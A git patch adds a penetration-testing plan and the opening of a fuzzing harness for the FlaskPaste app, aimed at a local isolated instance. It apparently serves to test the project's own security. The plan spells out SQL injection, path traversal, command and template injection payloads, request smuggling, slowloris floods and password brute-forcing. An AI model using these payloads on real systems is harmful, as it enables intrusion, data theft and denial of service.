From 0a7627fbe5ed313b3df982c3d99513afae759b49 Mon Sep 17 00:00:00 2001 From: Username Date: Thu, 25 Dec 2025 01:11:02 +0100 Subject: [PATCH] add offensive security testing framework - FUZZING.md: comprehensive attack methodology covering 10 phases - tests/fuzz/run_fuzz.py: automated fuzzing harness with 6 test phases Phases: recon, input fuzzing, injection (SQLi, SSTI, path traversal, command injection), auth bypass, business logic, crypto attacks. Includes: radamsa mutations, hypothesis property testing, atheris coverage-guided fuzzing, HTTP smuggling, slowloris, nuclei templates. --- FUZZING.md | 1033 ++++++++++++++++++++++++++++++++++++++++ tests/fuzz/run_fuzz.py | 962 +++++++++++++++++++++++++++++++++++++ 2 files changed, 1995 insertions(+) create mode 100644 FUZZING.md create mode 100755 tests/fuzz/run_fuzz.py diff --git a/FUZZING.md b/FUZZING.md new file mode 100644 index 0000000..d80dd9e --- /dev/null +++ b/FUZZING.md @@ -0,0 +1,1033 @@ +# Offensive Security Testing Plan + +Comprehensive fuzzing and penetration testing for FlaskPaste. +No restrictions. Break everything. + +--- + +## Test Environment Setup + +### Isolated Instance + +```bash +# Create isolated workspace +export FUZZ_DIR="/tmp/flaskpaste-fuzz" +mkdir -p "$FUZZ_DIR"/{db,logs,crashes,results} + +# Environment for isolated instance +export FLASKPASTE_DATABASE="$FUZZ_DIR/db/fuzz.db" +export FLASKPASTE_SECRET_KEY="fuzz-$(openssl rand -hex 16)" +export FLASKPASTE_PKI_PASSWORD="fuzz-pki-password" +export FLASKPASTE_REGISTRATION_ENABLED=true +export FLASKPASTE_POW_DIFFICULTY=1 +export FLASKPASTE_RATE_LIMIT_ENABLED=false +export FLASKPASTE_PROXY_SECRET="" +export FLASK_ENV=development +export FLASK_DEBUG=0 + +# Start isolated instance +cd /home/user/git/flaskpaste +./venv/bin/python run.py --host 127.0.0.1 --port 5099 2>&1 | tee "$FUZZ_DIR/logs/server.log" & +FUZZ_PID=$! +echo $FUZZ_PID > "$FUZZ_DIR/server.pid" + +# Target +export TARGET="http://127.0.0.1:5099" +``` + +### Teardown + +```bash +kill $(cat "$FUZZ_DIR/server.pid") 2>/dev/null +rm -rf "$FUZZ_DIR" +``` + +--- + +## Attack Surface + +### Endpoints + +``` +┌────────────────────────┬─────────────────┬─────────────────────────────────┐ +│ Endpoint │ Methods │ Auth Required +├────────────────────────┼─────────────────┼─────────────────────────────────┤ +│ / │ GET, POST │ PoW for POST +│ /health │ GET │ No +│ /challenge │ GET │ No +│ /client │ GET │ No +│ /register/challenge │ GET │ No +│ /register │ POST │ PoW +│ /pastes │ GET │ Client cert +│ / │ GET, HEAD, PUT │ Optional password +│ //raw │ GET, HEAD │ Optional password +│ / │ DELETE │ Client cert + ownership +│ /pki │ GET │ No +│ /pki/ca │ POST │ PKI password +│ /pki/ca.crt │ GET │ No +│ /pki/issue │ POST │ Admin cert +│ /pki/certs │ GET │ Admin cert +│ /pki/revoke/ │ POST │ Admin cert +│ /audit │ GET │ Admin cert +└────────────────────────┴─────────────────┴─────────────────────────────────┘ +``` + +### Input Vectors + +**Headers:** +- `X-Forwarded-For` - IP spoofing +- `X-Forwarded-Proto`, `X-Scheme` - Protocol injection +- `X-Forwarded-Host`, `Host` - Host header injection +- `X-Paste-Password` - Password bypass +- `X-Proxy-Secret` - Auth bypass +- `X-SSL-Client-SHA1` - Cert fingerprint spoofing +- `X-PoW-Token`, `X-PoW-Solution` - PoW bypass +- `X-Burn-After-Read` - Logic manipulation +- `X-Expiry` - Time-based attacks +- `X-Remove-Password`, `X-Extend-Expiry` - State manipulation +- `Content-Type` - Parser confusion + +**Query Parameters:** +- `limit`, `offset` - Integer overflow, negative values +- `type`, `owner`, `event_type` - Injection +- `after`, `before`, `since`, `until` - Time manipulation +- `all` - Authorization bypass +- `client_id`, `paste_id`, `outcome` - ID enumeration + +**URL Parameters:** +- `paste_id` - Path traversal, injection, enumeration +- `serial` - Certificate serial injection + +**Body:** +- Raw bytes - Binary injection, null bytes +- JSON - Type confusion, nested objects +- Malformed encoding - UTF-8 attacks + +--- + +## Phase 1: Reconnaissance & Enumeration + +### Directory/Endpoint Fuzzing + +```bash +# Install tools +pip install httpx aiohttp + +# ffuf - fast web fuzzer +# Install: go install github.com/ffuf/ffuf/v2@latest +ffuf -u "$TARGET/FUZZ" -w /usr/share/wordlists/dirb/common.txt \ + -mc all -fc 404 -o "$FUZZ_DIR/results/endpoints.json" + +# Hidden endpoints +ffuf -u "$TARGET/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \ + -mc 200,201,301,302,400,401,403,405,500 -o "$FUZZ_DIR/results/hidden.json" + +# API versioning +for v in v1 v2 v3 api api/v1 api/v2 _api internal debug admin; do + curl -s -o /dev/null -w "%{http_code} /$v\n" "$TARGET/$v" +done +``` + +### Paste ID Enumeration + +```bash +# Sequential IDs +for i in $(seq 1 1000); do + curl -s -o /dev/null -w "%{http_code} $i\n" "$TARGET/$i" +done | grep -v "^404" + +# Common patterns +for id in test admin root debug null undefined NaN 0 -1 '' ' '; do + curl -s -o /dev/null -w "%{http_code} '$id'\n" "$TARGET/$id" +done +``` + +--- + +## Phase 2: Input Fuzzing + +### HTTP Method Fuzzing + +```bash +for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT \ + PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK; do + for endpoint in / /health /challenge /pastes /pki /audit; do + code=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "$TARGET$endpoint") + echo "$code $method $endpoint" + done +done | sort -u +``` + +### Header Injection + +```bash +# Host header poisoning +curl -v "$TARGET/" -H "Host: evil.com" +curl -v "$TARGET/" -H "X-Forwarded-Host: evil.com" +curl -v "$TARGET/" -H "X-Forwarded-For: 127.0.0.1" +curl -v "$TARGET/" -H "X-Forwarded-For: ' OR 1=1--" + +# Proxy secret brute force +for secret in '' admin password secret proxy 123456 test; do + curl -s -o /dev/null -w "%{http_code} '$secret'\n" \ + "$TARGET/pastes" -H "X-Proxy-Secret: $secret" +done + +# Fake client cert fingerprint +curl -v "$TARGET/pastes" -H "X-SSL-Client-SHA1: 0000000000000000000000000000000000000000" +curl -v "$TARGET/pastes" -H "X-SSL-Client-SHA1: ' OR 1=1--" +curl -v "$TARGET/pastes" -H "X-SSL-Client-SHA1: ../../../etc/passwd" +``` + +### PoW Bypass Attempts + +```bash +# Empty/malformed tokens +curl -X POST "$TARGET/" -d "test" \ + -H "X-PoW-Token: " -H "X-PoW-Solution: " + +curl -X POST "$TARGET/" -d "test" \ + -H "X-PoW-Token: invalid" -H "X-PoW-Solution: 0" + +# Negative solution +curl -X POST "$TARGET/" -d "test" \ + -H "X-PoW-Token: $(curl -s $TARGET/challenge | jq -r .token)" \ + -H "X-PoW-Solution: -1" + +# Overflow +curl -X POST "$TARGET/" -d "test" \ + -H "X-PoW-Token: test" \ + -H "X-PoW-Solution: 99999999999999999999999999999999" + +# Token reuse (race condition) +TOKEN=$(curl -s "$TARGET/challenge" | jq -r .token) +# Solve it, then try to reuse +``` + +### Content-Type Confusion + +```bash +# JSON body with wrong content-type +curl -X POST "$TARGET/" -d '{"content":"test"}' \ + -H "Content-Type: application/json" + +curl -X POST "$TARGET/" -d '{"content":"test"}' \ + -H "Content-Type: text/plain" + +curl -X POST "$TARGET/" -d '{"content":"test"}' \ + -H "Content-Type: application/x-www-form-urlencoded" + +# Multipart confusion +curl -X POST "$TARGET/" -F "file=@/etc/passwd" \ + -H "Content-Type: multipart/form-data" + +# XML injection attempt +curl -X POST "$TARGET/" -d ']>&xxe;' \ + -H "Content-Type: application/xml" +``` + +--- + +## Phase 3: Injection Attacks + +### SQL Injection + +```bash +# Paste ID injection +SQLI_PAYLOADS=( + "' OR '1'='1" + "1' OR '1'='1'--" + "1; DROP TABLE pastes;--" + "1 UNION SELECT * FROM users--" + "1' AND SLEEP(5)--" + "1' AND (SELECT COUNT(*) FROM sqlite_master)>0--" + "1/**/OR/**/1=1" + "1' OR ''='" +) + +for payload in "${SQLI_PAYLOADS[@]}"; do + encoded=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$payload'))") + curl -s -o /dev/null -w "%{http_code} %{time_total}s $payload\n" "$TARGET/$encoded" +done + +# Header injection +for payload in "${SQLI_PAYLOADS[@]}"; do + curl -s -o /dev/null -w "%{http_code} %{time_total}s\n" \ + "$TARGET/pastes" -H "X-SSL-Client-SHA1: $payload" +done + +# sqlmap automated +sqlmap -u "$TARGET/FUZZ" --batch --level=5 --risk=3 \ + --technique=BEUSTQ --dbms=sqlite \ + -o --output-dir="$FUZZ_DIR/results/sqlmap" +``` + +### Path Traversal + +```bash +TRAVERSAL_PAYLOADS=( + "../../../etc/passwd" + "....//....//....//etc/passwd" + "..%2f..%2f..%2fetc/passwd" + "..%252f..%252f..%252fetc/passwd" + "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd" + "....\/....\/....\/etc/passwd" + "..;/..;/..;/etc/passwd" + "..//..//..//etc/passwd" +) + +for payload in "${TRAVERSAL_PAYLOADS[@]}"; do + curl -s -o /dev/null -w "%{http_code} $payload\n" "$TARGET/$payload" + curl -s -o /dev/null -w "%{http_code} $payload (raw)\n" "$TARGET/$payload/raw" +done +``` + +### Command Injection + +```bash +CMD_PAYLOADS=( + "; ls -la" + "| cat /etc/passwd" + "\$(cat /etc/passwd)" + "\`cat /etc/passwd\`" + "|| cat /etc/passwd" + "&& cat /etc/passwd" + "; sleep 10" + "| sleep 10" +) + +for payload in "${CMD_PAYLOADS[@]}"; do + # In paste content + curl -s -X POST "$TARGET/" -d "$payload" -o /dev/null -w "%{time_total}s\n" + + # In headers + curl -s "$TARGET/" -H "X-Forwarded-For: $payload" -o /dev/null +done +``` + +### SSTI (Server-Side Template Injection) + +```bash +SSTI_PAYLOADS=( + "{{7*7}}" + "{{config}}" + "{{self.__class__.__mro__[2].__subclasses__()}}" + "${7*7}" + "<%= 7*7 %>" + "{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}" + "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}" +) + +for payload in "${SSTI_PAYLOADS[@]}"; do + # Create paste with SSTI payload + response=$(curl -s -X POST "$TARGET/" -d "$payload" \ + -H "X-PoW-Token: test" -H "X-PoW-Solution: 0") + echo "$response" | grep -q "49" && echo "SSTI CONFIRMED: $payload" +done +``` + +--- + +## Phase 4: Authentication & Authorization + +### Certificate Fingerprint Attacks + +```bash +# Fingerprint enumeration +for i in $(seq -w 00 ff); do + fp="${i}00000000000000000000000000000000000000" + code=$(curl -s -o /dev/null -w "%{http_code}" \ + "$TARGET/pastes" -H "X-SSL-Client-SHA1: $fp") + [ "$code" != "401" ] && echo "Hit: $fp -> $code" +done + +# Known weak fingerprints +WEAK_FPS=( + "0000000000000000000000000000000000000000" + "da39a3ee5e6b4b0d3255bfef95601890afd80709" # SHA1 of empty + "ffffffffffffffffffffffffffffffffffffffff" +) + +for fp in "${WEAK_FPS[@]}"; do + curl -v "$TARGET/pastes" -H "X-SSL-Client-SHA1: $fp" +done +``` + +### Admin Privilege Escalation + +```bash +# Try to issue certs without admin +curl -X POST "$TARGET/pki/issue" \ + -H "Content-Type: application/json" \ + -d '{"common_name": "hacker"}' + +# Try to access audit without admin +curl "$TARGET/audit" + +# Certificate serial manipulation +curl -X POST "$TARGET/pki/revoke/1" +curl -X POST "$TARGET/pki/revoke/-1" +curl -X POST "$TARGET/pki/revoke/999999999999" +curl -X POST "$TARGET/pki/revoke/../../../" +``` + +### Password Protection Bypass + +```bash +# Create password-protected paste, try to bypass +PASTE_ID="test123" + +# Timing attack on password check +for i in $(seq 1 100); do + curl -s -o /dev/null -w "%{time_total}\n" \ + "$TARGET/$PASTE_ID" -H "X-Paste-Password: wrong$i" +done | sort -n + +# Empty password +curl "$TARGET/$PASTE_ID" -H "X-Paste-Password: " + +# Null byte injection +curl "$TARGET/$PASTE_ID" -H "X-Paste-Password: correct%00garbage" +``` + +--- + +## Phase 5: Business Logic Attacks + +### Race Conditions + +```bash +# Concurrent paste creation with same content (dedup bypass) +for i in $(seq 1 100); do + curl -s -X POST "$TARGET/" -d "race-test-content" & +done +wait + +# Burn-after-read race +PASTE_ID="burn-test" +# Create burn paste, then race to read multiple times +for i in $(seq 1 50); do + curl -s "$TARGET/$PASTE_ID" & +done +wait + +# Rate limit race +for i in $(seq 1 200); do + curl -s -X POST "$TARGET/" -d "rate-limit-test-$i" & +done +wait +``` + +### Expiry Manipulation + +```bash +# Negative expiry +curl -X POST "$TARGET/" -d "test" -H "X-Expiry: -1" +curl -X POST "$TARGET/" -d "test" -H "X-Expiry: -999999999" + +# Overflow expiry +curl -X POST "$TARGET/" -d "test" -H "X-Expiry: 999999999999999999" + +# Time travel +curl -X POST "$TARGET/" -d "test" -H "X-Expiry: 0" + +# Extend beyond limits +curl -X PUT "$TARGET/test-paste" -H "X-Extend-Expiry: 999999999" +``` + +### Resource Exhaustion + +```bash +# Large paste (memory exhaustion) +dd if=/dev/urandom bs=1M count=100 | curl -X POST "$TARGET/" --data-binary @- + +# Many small pastes (DB exhaustion) +for i in $(seq 1 10000); do + curl -s -X POST "$TARGET/" -d "flood-$i" & + [ $((i % 100)) -eq 0 ] && wait +done + +# Deep recursion in JSON +python3 -c "print('{' * 1000 + '\"a\":1' + '}' * 1000)" | \ + curl -X POST "$TARGET/pki/ca" -H "Content-Type: application/json" -d @- +``` + +--- + +## Phase 6: Cryptographic Attacks + +### PoW Token Analysis + +```bash +# Collect tokens for pattern analysis +for i in $(seq 1 1000); do + curl -s "$TARGET/challenge" | jq -r .token >> "$FUZZ_DIR/results/tokens.txt" +done + +# Analyze randomness +python3 << 'EOF' +import base64 +import collections + +with open("/tmp/flaskpaste-fuzz/results/tokens.txt") as f: + tokens = [line.strip() for line in f] + +# Check for patterns +for i, t in enumerate(tokens[:-1]): + if t == tokens[i+1]: + print(f"DUPLICATE TOKEN at {i}: {t}") + +# Byte distribution +all_bytes = b''.join(base64.b64decode(t) for t in tokens if t) +dist = collections.Counter(all_bytes) +print(f"Byte distribution entropy: {len(dist)}/256") +EOF +``` + +### Timing Attacks + +```bash +# Password comparison timing +python3 << 'EOF' +import requests +import statistics +import time + +target = "http://127.0.0.1:5099" +paste_id = "test-timing" + +# Measure response times for different password lengths +results = {} +for length in range(1, 20): + password = "a" * length + times = [] + for _ in range(100): + start = time.perf_counter() + requests.get(f"{target}/{paste_id}", headers={"X-Paste-Password": password}) + times.append(time.perf_counter() - start) + results[length] = statistics.mean(times) + print(f"Length {length}: {results[length]*1000:.3f}ms") + +# Look for timing differences +EOF +``` + +### Certificate Attacks + +```bash +# Generate malformed certificates +openssl ecparam -name secp384r1 -genkey -out "$FUZZ_DIR/bad.key" + +# Self-signed with weird parameters +openssl req -new -x509 -key "$FUZZ_DIR/bad.key" -out "$FUZZ_DIR/bad.crt" \ + -days 1 -subj "/CN='; DROP TABLE certificates;--" + +# Try to register with malformed cert +curl -X POST "$TARGET/register" \ + --cert "$FUZZ_DIR/bad.crt" --key "$FUZZ_DIR/bad.key" + +# PKI password brute force +COMMON_PASSWORDS=( + "" "password" "admin" "123456" "pki" "secret" + "flaskpaste" "certificate" "ca" "root" +) + +for pw in "${COMMON_PASSWORDS[@]}"; do + code=$(curl -s -o /dev/null -w "%{http_code}" \ + -X POST "$TARGET/pki/ca" \ + -H "Content-Type: application/json" \ + -d "{\"password\": \"$pw\"}") + echo "$code $pw" +done +``` + +--- + +## Phase 7: Advanced Fuzzing + +### Radamsa Mutations + +```bash +# Install radamsa +# git clone https://gitlab.com/akihe/radamsa && cd radamsa && make && sudo make install + +# Generate mutated inputs +echo "normal paste content" > "$FUZZ_DIR/seed.txt" + +for i in $(seq 1 1000); do + radamsa "$FUZZ_DIR/seed.txt" | curl -s -X POST "$TARGET/" \ + --data-binary @- -o /dev/null -w "%{http_code}\n" 2>/dev/null +done | sort | uniq -c + +# Mutate JSON +echo '{"common_name": "test"}' > "$FUZZ_DIR/seed.json" +for i in $(seq 1 1000); do + radamsa "$FUZZ_DIR/seed.json" | curl -s -X POST "$TARGET/pki/ca" \ + -H "Content-Type: application/json" \ + --data-binary @- -o /dev/null -w "%{http_code}\n" 2>/dev/null +done | sort | uniq -c +``` + +### AFL++ (if Python can be instrumented) + +```bash +# Python AFL instrumentation (experimental) +pip install python-afl + +# Create harness +cat > "$FUZZ_DIR/harness.py" << 'HARNESS' +import afl +import sys +sys.path.insert(0, '/home/user/git/flaskpaste') +from app import create_app + +app = create_app() + +afl.init() +with app.test_client() as client: + data = sys.stdin.buffer.read() + try: + client.post('/', data=data) + except Exception: + pass +HARNESS + +# Run AFL +# py-afl-fuzz -i "$FUZZ_DIR/seeds" -o "$FUZZ_DIR/afl-out" -- python "$FUZZ_DIR/harness.py" +``` + +### Hypothesis Property Testing + +```bash +cat > "$FUZZ_DIR/hypothesis_fuzz.py" << 'HYPO' +import hypothesis +from hypothesis import given, strategies as st, settings +import requests +import os + +TARGET = os.environ.get("TARGET", "http://127.0.0.1:5099") + +@settings(max_examples=10000, deadline=None) +@given(st.binary(min_size=0, max_size=10000)) +def test_paste_content(content): + """Fuzz paste content with arbitrary bytes.""" + try: + r = requests.post(TARGET + "/", data=content, timeout=5) + assert r.status_code in (201, 400, 413, 429, 503) + except requests.exceptions.RequestException: + pass + +@settings(max_examples=10000, deadline=None) +@given(st.text(min_size=0, max_size=1000)) +def test_paste_id(paste_id): + """Fuzz paste ID retrieval.""" + try: + r = requests.get(f"{TARGET}/{paste_id}", timeout=5) + assert r.status_code in (200, 400, 404, 410) + except requests.exceptions.RequestException: + pass + +@settings(max_examples=5000, deadline=None) +@given( + st.dictionaries( + st.text(min_size=1, max_size=50), + st.one_of(st.text(), st.integers(), st.floats(), st.none(), st.booleans()), + min_size=0, max_size=20 + ) +) +def test_pki_json(data): + """Fuzz PKI endpoints with arbitrary JSON.""" + try: + r = requests.post( + TARGET + "/pki/ca", + json=data, + timeout=5 + ) + assert r.status_code in (200, 201, 400, 401, 403, 409, 500) + except requests.exceptions.RequestException: + pass + +@settings(max_examples=5000, deadline=None) +@given(st.dictionaries(st.text(), st.text(), min_size=0, max_size=30)) +def test_arbitrary_headers(headers): + """Fuzz with arbitrary headers.""" + safe_headers = {k[:100]: v[:1000] for k, v in headers.items() + if k and not k.lower().startswith(('host', 'content-length'))} + try: + r = requests.get(TARGET + "/", headers=safe_headers, timeout=5) + except requests.exceptions.RequestException: + pass + +if __name__ == "__main__": + test_paste_content() + test_paste_id() + test_pki_json() + test_arbitrary_headers() +HYPO + +pip install hypothesis requests +python "$FUZZ_DIR/hypothesis_fuzz.py" +``` + +### Atheris (LibFuzzer for Python) + +```bash +cat > "$FUZZ_DIR/atheris_fuzz.py" << 'ATHERIS' +import atheris +import sys + +with atheris.instrument_imports(): + sys.path.insert(0, '/home/user/git/flaskpaste') + from app import create_app + from app.database import init_db + import tempfile + import os + +# Create isolated app +tmpdir = tempfile.mkdtemp() +os.environ['FLASKPASTE_DATABASE'] = f'{tmpdir}/fuzz.db' +app = create_app() + +def TestOneInput(data): + with app.test_client() as client: + fdp = atheris.FuzzedDataProvider(data) + + # Fuzz endpoint + endpoint = fdp.ConsumeUnicodeNoSurrogates(100) + method = fdp.PickValueInList(['GET', 'POST', 'PUT', 'DELETE', 'HEAD']) + body = fdp.ConsumeBytes(fdp.remaining_bytes()) + + try: + if method == 'GET': + client.get(f'/{endpoint}') + elif method == 'POST': + client.post(f'/{endpoint}', data=body) + elif method == 'PUT': + client.put(f'/{endpoint}', data=body) + elif method == 'DELETE': + client.delete(f'/{endpoint}') + elif method == 'HEAD': + client.head(f'/{endpoint}') + except Exception: + pass + +if __name__ == "__main__": + atheris.Setup(sys.argv, TestOneInput) + atheris.Fuzz() +ATHERIS + +pip install atheris +python "$FUZZ_DIR/atheris_fuzz.py" -max_len=10000 -runs=100000 +``` + +--- + +## Phase 8: Protocol-Level Attacks + +### HTTP Smuggling + +```bash +# CL.TE smuggling attempt +printf 'POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED' | \ + nc 127.0.0.1 5099 + +# TE.CL smuggling attempt +printf 'POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n8\r\nSMUGGLED\r\n0\r\n\r\n' | \ + nc 127.0.0.1 5099 + +# Double Content-Length +printf 'POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 5\r\nContent-Length: 100\r\n\r\nHELLO' | \ + nc 127.0.0.1 5099 +``` + +### HTTP/2 Attacks (if applicable) + +```bash +# h2c smuggling +curl --http2 "$TARGET/" +curl --http2-prior-knowledge "$TARGET/" + +# HPACK bomb +# Requires specialized tools +``` + +### Slowloris / Slow POST + +```bash +# Slow headers +python3 << 'EOF' +import socket +import time + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect(("127.0.0.1", 5099)) +sock.send(b"POST / HTTP/1.1\r\nHost: target\r\n") + +for i in range(100): + sock.send(f"X-Header-{i}: {'A'*100}\r\n".encode()) + time.sleep(1) + print(f"Sent header {i}") +EOF + +# Slow body +python3 << 'EOF' +import socket +import time + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect(("127.0.0.1", 5099)) +sock.send(b"POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 1000000\r\n\r\n") + +for i in range(1000): + sock.send(b"A") + time.sleep(0.1) + print(f"Sent byte {i}") +EOF +``` + +--- + +## Phase 9: Specialized Tools + +### Nuclei Templates + +```bash +# Install nuclei +go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest + +# Run all templates +nuclei -u "$TARGET" -t nuclei-templates/ -o "$FUZZ_DIR/results/nuclei.txt" + +# Custom template for FlaskPaste +cat > "$FUZZ_DIR/flaskpaste.yaml" << 'TEMPLATE' +id: flaskpaste-pow-bypass +info: + name: FlaskPaste PoW Bypass + severity: high + +requests: + - method: POST + path: + - "{{BaseURL}}/" + headers: + X-PoW-Token: "invalid" + X-PoW-Solution: "0" + body: "test" + matchers: + - type: status + status: + - 201 +TEMPLATE + +nuclei -u "$TARGET" -t "$FUZZ_DIR/flaskpaste.yaml" +``` + +### Burp Suite / ZAP Automation + +```bash +# OWASP ZAP API scan +docker run -t owasp/zap2docker-stable zap-api-scan.py \ + -t "$TARGET" -f openapi -r "$FUZZ_DIR/results/zap-report.html" + +# ZAP baseline scan +docker run -t owasp/zap2docker-stable zap-baseline.py \ + -t "$TARGET" -r "$FUZZ_DIR/results/zap-baseline.html" +``` + +### Custom Python Fuzzer + +```python +#!/usr/bin/env python3 +"""Comprehensive FlaskPaste fuzzer.""" +import asyncio +import aiohttp +import random +import string +import hashlib +import json +import os +from pathlib import Path + +TARGET = os.environ.get("TARGET", "http://127.0.0.1:5099") +RESULTS_DIR = Path(os.environ.get("FUZZ_DIR", "/tmp/flaskpaste-fuzz")) / "results" +RESULTS_DIR.mkdir(parents=True, exist_ok=True) + +# Payload generators +def random_bytes(n): + return bytes(random.getrandbits(8) for _ in range(n)) + +def random_string(n): + return ''.join(random.choices(string.printable, k=n)) + +def null_bytes(): + return b'\x00' * random.randint(1, 100) + +def unicode_bombs(): + return random.choice([ + '\u202e' * 100, # RTL override + '\ufeff' * 100, # BOM + '\u0000' * 100, # Null + 'A\u0300' * 100, # Combining chars + '\U0001F4A9' * 100, # Emoji + ]) + +async def fuzz_endpoint(session, method, path, **kwargs): + try: + async with session.request(method, f"{TARGET}{path}", **kwargs, timeout=5) as r: + return r.status, await r.text() + except Exception as e: + return None, str(e) + +async def fuzz_paste_creation(session): + """Fuzz paste creation with various payloads.""" + payloads = [ + random_bytes(random.randint(1, 10000)), + null_bytes(), + unicode_bombs().encode(), + b'A' * 100_000_000, # 100MB + json.dumps({"nested": {"deep": {"structure": True}}}).encode(), + b']>&xxe;', + ] + + for payload in payloads: + status, body = await fuzz_endpoint(session, 'POST', '/', data=payload) + if status and status not in (201, 400, 413, 429, 503): + print(f"UNEXPECTED: POST / -> {status}") + with open(RESULTS_DIR / "anomalies.log", "a") as f: + f.write(f"POST / payload={payload[:100]!r} status={status}\n") + +async def fuzz_headers(session): + """Fuzz with malicious headers.""" + headers_payloads = [ + {"X-Forwarded-For": "' OR 1=1--"}, + {"X-SSL-Client-SHA1": "../../../etc/passwd"}, + {"X-PoW-Token": "A" * 10000}, + {"X-Expiry": "-1"}, + {"X-Expiry": "99999999999999999999"}, + {"Host": "evil.com\r\nX-Injected: true"}, + {"Content-Type": "text/html; charset=utf-8\r\nX-Injected: true"}, + ] + + for headers in headers_payloads: + status, body = await fuzz_endpoint(session, 'GET', '/', headers=headers) + if "X-Injected" in body: + print(f"HEADER INJECTION FOUND: {headers}") + +async def fuzz_path_traversal(session): + """Fuzz for path traversal.""" + paths = [ + "/../../../etc/passwd", + "/....//....//....//etc/passwd", + "/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd", + "/..%252f..%252f..%252fetc/passwd", + "/", + "/{{7*7}}", + "/${7*7}", + ] + + for path in paths: + status, body = await fuzz_endpoint(session, 'GET', path) + if status == 200 and ("root:" in body or "49" in body or "alert" in body): + print(f"VULNERABILITY FOUND: {path}") + +async def main(): + async with aiohttp.ClientSession() as session: + await asyncio.gather( + fuzz_paste_creation(session), + fuzz_headers(session), + fuzz_path_traversal(session), + ) + +if __name__ == "__main__": + asyncio.run(main()) +``` + +--- + +## Phase 10: Crash Analysis + +### Monitor for Crashes + +```bash +# Watch server logs for errors +tail -f "$FUZZ_DIR/logs/server.log" | grep -iE "error|exception|traceback|crash|segfault" | \ + tee "$FUZZ_DIR/crashes/errors.log" + +# Monitor process +while true; do + if ! kill -0 $(cat "$FUZZ_DIR/server.pid") 2>/dev/null; then + echo "SERVER CRASHED at $(date)" >> "$FUZZ_DIR/crashes/crash.log" + # Restart and continue + cd /home/user/git/flaskpaste + ./venv/bin/python run.py --host 127.0.0.1 --port 5099 & + echo $! > "$FUZZ_DIR/server.pid" + fi + sleep 1 +done +``` + +### Reproduce Crashes + +```bash +# Replay payloads that caused issues +for payload in "$FUZZ_DIR/crashes"/*.payload; do + echo "Replaying: $payload" + curl -X POST "$TARGET/" --data-binary "@$payload" -v +done +``` + +--- + +## Results Collection + +### Summary Report + +```bash +cat > "$FUZZ_DIR/generate_report.sh" << 'REPORT' +#!/bin/bash +echo "# FlaskPaste Fuzzing Results" +echo "Generated: $(date)" +echo "" +echo "## Statistics" +echo "- Total requests: $(wc -l < "$FUZZ_DIR/logs/server.log" 2>/dev/null || echo 0)" +echo "- Crashes detected: $(wc -l < "$FUZZ_DIR/crashes/crash.log" 2>/dev/null || echo 0)" +echo "- Anomalies: $(wc -l < "$FUZZ_DIR/results/anomalies.log" 2>/dev/null || echo 0)" +echo "" +echo "## Findings" +cat "$FUZZ_DIR/results/anomalies.log" 2>/dev/null +echo "" +echo "## Tool Results" +for f in "$FUZZ_DIR/results"/*.txt "$FUZZ_DIR/results"/*.json; do + [ -f "$f" ] && echo "### $(basename $f)" && head -50 "$f" +done +REPORT +chmod +x "$FUZZ_DIR/generate_report.sh" +``` + +--- + +## Quick Start + +```bash +# One-liner to run everything +export FUZZ_DIR="/tmp/flaskpaste-fuzz" +export TARGET="http://127.0.0.1:5099" +mkdir -p "$FUZZ_DIR"/{db,logs,crashes,results} + +# Start server +cd /home/user/git/flaskpaste +FLASKPASTE_DATABASE="$FUZZ_DIR/db/fuzz.db" \ +FLASKPASTE_POW_DIFFICULTY=1 \ +FLASKPASTE_RATE_LIMIT_ENABLED=false \ +./venv/bin/python run.py --host 127.0.0.1 --port 5099 & + +# Run fuzzing phases +sleep 2 +./fuzz-phase1.sh # Recon +./fuzz-phase2.sh # Input fuzzing +./fuzz-phase3.sh # Injection +# ... etc + +# Generate report +./generate_report.sh > "$FUZZ_DIR/REPORT.md" +``` diff --git a/tests/fuzz/run_fuzz.py b/tests/fuzz/run_fuzz.py new file mode 100755 index 0000000..4e64a6b --- /dev/null +++ b/tests/fuzz/run_fuzz.py @@ -0,0 +1,962 @@ +#!/usr/bin/env python3 +""" +FlaskPaste Offensive Security Testing Harness + +Runs comprehensive fuzzing and penetration testing against +an isolated FlaskPaste instance. + +Usage: + ./run_fuzz.py [--phases PHASES] [--quick] [--verbose] + +Examples: + ./run_fuzz.py # Run all phases + ./run_fuzz.py --phases 1,2,3 # Run specific phases + ./run_fuzz.py --quick # Quick smoke test +""" +from __future__ import annotations + +import argparse +import asyncio +import hashlib +import json +import os +import random +import shutil +import signal +import socket +import string +import subprocess +import sys +import tempfile +import time +from dataclasses import dataclass, field +from pathlib import Path +from typing import Any +from urllib.parse import quote + +# Ensure we can import the app +sys.path.insert(0, str(Path(__file__).parent.parent.parent)) + + +@dataclass +class Finding: + """Security finding.""" + + severity: str # CRITICAL, HIGH, MEDIUM, LOW, INFO + category: str # Injection, Auth, Logic, Crypto, DoS, Info + endpoint: str + vector: str + description: str + reproduction: str + impact: str + evidence: str = "" + + def __str__(self) -> str: + return f""" +┌─────────────────────────────────────────────────────────────────────────────┐ +│ FINDING: {self.category}-{self.severity[:4]} +├─────────────────────────────────────────────────────────────────────────────┤ +│ Severity: {self.severity} +│ Category: {self.category} +│ Endpoint: {self.endpoint} +│ Vector: {self.vector} +├─────────────────────────────────────────────────────────────────────────────┤ +│ Description: +│ {self.description} +│ +│ Reproduction: +│ {self.reproduction} +│ +│ Impact: +│ {self.impact} +│ +│ Evidence: +│ {self.evidence[:200]} +└─────────────────────────────────────────────────────────────────────────────┘ +""" + + +@dataclass +class FuzzResult: + """Result of a fuzz test.""" + + phase: str + test: str + status: str 